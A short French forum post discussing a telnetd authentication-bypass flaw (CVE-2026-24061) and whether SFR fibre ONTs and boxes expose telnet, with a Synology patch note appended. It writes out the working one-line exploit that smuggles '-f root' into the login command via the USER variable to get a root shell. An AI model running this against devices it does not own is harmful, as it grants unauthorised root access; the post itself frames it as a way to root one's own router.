Salut a tous,
suite a la lecture de cette news : https://korben.info/telnetd-faille-root-exploit.html
certains d'entre vous ont ils testé sur leur ONT externe SFR ? ou leur ONT SFP car il me semble que telnet est actif sur certains firmware. Je ne sais plus si la box NB6VAC n'a pas son telnet activé aussi ?!

En gros, le serveur telnetd passe la variable d'environnement USER directement à la commande login sans la nettoyer. Du coup, un attaquant n'a qu'à définir USER sur -f root

 et utiliser telnet -a pour se retrouver connecté en root.

Donc si je comprends bien :
USER='-f root'
telnet -a 192.168.x.x

ici je vois qu'ils mettent tout sur la meme ligne : https://medium.com/@shivam_bathla/telnetd-auth-bypass-to-root-f6e239d692b5
USER="-f root" telnet -a IP_ADDRESS [PORT]
Cette astuce va etre utile pour rooter certains routeurs et faciliter leur passage sous openwrt 

j'ai reçu une maj pour mes nas synology :
https://www.synology.com/fr-fr/releaseNote/DSM?model=DS1522%2B

Fixed Issues
Fixed a security vulnerability regarding telnetd (CVE-2026-24061).

le DSM est pourtant fermé meme s'ils s'appuient sur beaucoup d'open source.